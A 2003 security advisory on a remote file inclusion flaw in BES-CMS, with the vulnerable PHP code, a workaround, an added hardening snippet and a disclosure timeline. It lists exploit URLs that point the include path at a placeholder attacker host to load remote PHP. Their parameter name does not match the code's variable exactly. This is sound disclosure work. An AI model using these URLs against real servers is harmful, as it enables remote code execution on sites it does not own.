[UNIX] BES-CMS File Inclusion Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/03

    To: list@securiteam.com
    Date: 22 Dec 2003 15:23:27 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      BES-CMS File Inclusion Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

     <http://bes.h6p.org> bes-cms is "a professional dynamic php website
    building tool. It was developed at mokka by a bored programmer. Bes-cms is
    capable of creating image galleries, message boards, news sections,
    download sections, contact sections and many more to be added on the plugin
    server". A vulnerability has been discovered in bes-cms that allows remote
    attackers to make the script include arbitrary PHP code, which leads to
    remote command execution.

    DETAILS

    Vulnerable systems:
     * bes-cms version 0.4 rc3
     * bes-cms version 0.5 rc3

    Immune systems:
     * bes-cms version 0.5 rc4

    In the files:
     * index.inc.php
     * Members/index.inc.php
     * Members/root/index.inc.php

    We can see the following code:
    include_once($PATH__Includes."actions_default.php");

    In the Include/functions_folder.php file :
    include($PATH__Includes.'functions_folder_modules.php');
    include($PATH__Includes.'functions_folder_plugins.php');
    include($PATH__Includes.'functions_folder_files.php');

    In the Include/functions_hacking.php file :
    switch($_GET['itemID'])
    {
      case 'usershow':
        include_once("".$PATH__Includes."functions_user.php");
        Show_USer_Details($_GET['user']);
        break;
      [...]
      case 'send_bug':
        if ($UserDetails['LOGGED_IN'] == 'YES')
        {
          global $PATH__Includes;
          include_once("".$PATH__Includes."functions_error.php");
          send_bug_report();
        }
        break;
      [...]
      case 'content_view':
        global $PATH___Includes;
        include_once("".$PATH__Includes."functions_message_docTypes.php");
        Message_Centent_View($Plugin_Path);
        break;

      case 'logger':
        global $PATH__Includes;
        include_once("".$PATH__Includes."functions_users.php");
        Loggin_Message();
        break;

      case 'search':
        global $PATH__Includes;
        include_once("".$PATH__Includes."functions_general.php");
        Display_Search_Results($_POST['search_str']);
        break;
      [...]

    In the Include/functions_message.php file:
    include($PATH__Includes.'functions_message_docTypes.php');
    include($PATH__Includes.'functions_message_edit.php');

    In addition, in the Include/Start.php file:
    include_once($inc_path."Include/vars.php");

    This makes all of these files vulnerable: every include path begins with a
    variable that is never initialized in the code ($inc_path or
    $PATH__Includes), so an attacker can supply its value.

    Exploits:
    If register_globals is set to ON, any of the URLs below will cause the
    script to include external files.

    The following URLs will cause the server to include external files:
    http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
    http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/
    http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/

    The requested file will be http://[attacker]/actions_default.php.

    The following URL will cause the server to include:
    http://[target]/Include/functions_folder.php?PATH_Includes=http://[attacker]/

    The requested files will be
    http://[attacker]/functions_folder_modules.php,
    http://[attacker]/functions_folder_plugins.php,
    http://[attacker]/functions_folder_files.php.

    The following URLs will cause the server to include external files:
    http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=usershow
    http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=logger

    The requested file will be http://[attacker]/functions_user.php.

    The following URL will cause the server to include external files:
    http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES

    The requested file will be http://[attacker]/functions_error.php.

    The following URL will cause the server to include external files:
    http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=content_view

    The requested file will be
    http://[attacker]/functions_message_docTypes.php.

    The following URL will cause the server to include external files:
    http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=search

    The requested file will be http://[attacker]/functions_general.php.

    The following URL will cause the server to include external files:
    http://[target]/Include/functions_message.php?PATH_Includes=http://[attacker]/

    The requested files will be
    http://[attacker]/functions_message_docTypes.php,
    http://[attacker]/functions_message_edit.php.

    The following URL will cause the server to include external files:
    http://[target]/Include/Start.php?inc_path=http://[attacker]/

    The requested file will be http://[attacker]/Include/vars.php.

    Solution:
    The vendor was notified and has released an immune version (version 0.5
    rc4).

    Workaround:
    In index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
    Include/functions_folder.php, Include/functions_hacking.php and
    Include/functions_message.php, add the following as the first line of the
    file:

    if (isset($_REQUEST["PATH__Includes"])){ die("Patched by phpSecure.info"); }

    And at the beginning of the Include/Start.php file, add the following as
    the first line:

    if (isset($_REQUEST["inc_path"])){ die("Patched by phpSecure.info"); }
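    The workaround above only rejects requests that carry the variable name; the root cause is that the include base is never assigned before use. The following is an added example (not BES-CMS code, not the advisory's) of how the dispatcher in functions_hacking.php could be hardened: it assumes the application's include directory is ./Include beside the script, and the function names include_module and INCLUDE_ALLOWLIST are hypothetical.

```php
<?php
// Added example, not BES-CMS code: a hardened replacement for the advisory's
// include_once($PATH__Includes . "actions_default.php") pattern.
// Assumes the application's include directory is ./Include beside this file.

// 1. Initialise the include base *before* any include, and as a constant:
//    request data cannot overwrite a constant even with register_globals=On,
//    whereas an unassigned $PATH__Includes is filled from the query string.
$base = realpath(dirname(__FILE__) . '/Include');
if ($base === false) {
    die('Include directory missing');
}
define('PATH__INCLUDES', $base . DIRECTORY_SEPARATOR);

// 2. Only names on this list may be included; the client never chooses a path.
$GLOBALS['INCLUDE_ALLOWLIST'] = array(
    'actions_default.php',
    'functions_user.php',
    'functions_error.php',
    'functions_general.php',
    'functions_message_docTypes.php',
);

// Returns true when the named module was included, false when it was refused.
function include_module($name)
{
    if (!in_array($name, $GLOBALS['INCLUDE_ALLOWLIST'], true)) {
        trigger_error("refused include of unlisted module: $name", E_USER_WARNING);
        return false;
    }
    // 3. realpath() resolves symlinks and "..", so the prefix test runs on the
    //    real file; a URL such as http://[attacker]/ can never pass it.
    $real = realpath(PATH__INCLUDES . $name);
    if ($real === false || strpos($real, PATH__INCLUDES) !== 0) {
        trigger_error("refused include outside include dir: $name", E_USER_WARNING);
        return false;
    }
    include_once $real;
    return true;
}

// The advisory's dispatcher, rewritten to go through include_module():
switch (isset($_GET['itemID']) ? $_GET['itemID'] : '') {
    case 'usershow':
        if (include_module('functions_user.php')) {
            Show_USer_Details(isset($_GET['user']) ? $_GET['user'] : '');
        }
        break;
}
```

    At the server level, setting register_globals=Off and allow_url_fopen=Off in php.ini removes both preconditions of this class of bug (request data flowing into unset variables, and include() fetching remote URLs) independently of the application code.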

    Disclosure timeline:
    13/12/2003 Vulnerability discovered
    14/12/2003 Vendor notified
    15/12/2003 Vendor response
    15/12/2003 Security Corporation clients notified
    15/12/2003 Started e-mail discussions
    20/12/2003 Last e-mail received
    20/12/2003 Public disclosure

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:frog-man@security-corporation.com> frog-m@n.

